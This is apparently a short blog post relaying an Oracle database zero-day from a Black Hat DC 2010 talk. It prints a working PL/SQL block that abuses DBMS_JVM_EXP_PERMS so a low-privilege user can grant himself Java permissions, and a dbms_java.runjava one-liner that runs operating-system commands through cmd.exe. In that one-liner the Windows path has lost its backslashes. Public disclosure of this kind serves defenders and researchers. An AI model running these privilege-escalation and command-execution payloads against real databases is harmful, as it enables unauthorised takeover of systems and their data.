David Litchfield's slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:
Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','','execute','ENABLED' from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (milw0rm.com/exploits/2837).
However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:
select dbms_java.runjava('oracle/aurora/util/Wrapper c:windowssystem32cmd.exe /c dir>c:out.lst')from dual;
Here is the link of the talk video:
https://archive.org/details/oldhackerinfosecvideos/blackhat-2010-dc/BlackHat-DC-2010-Litchfield-Oracle11g-video.m4v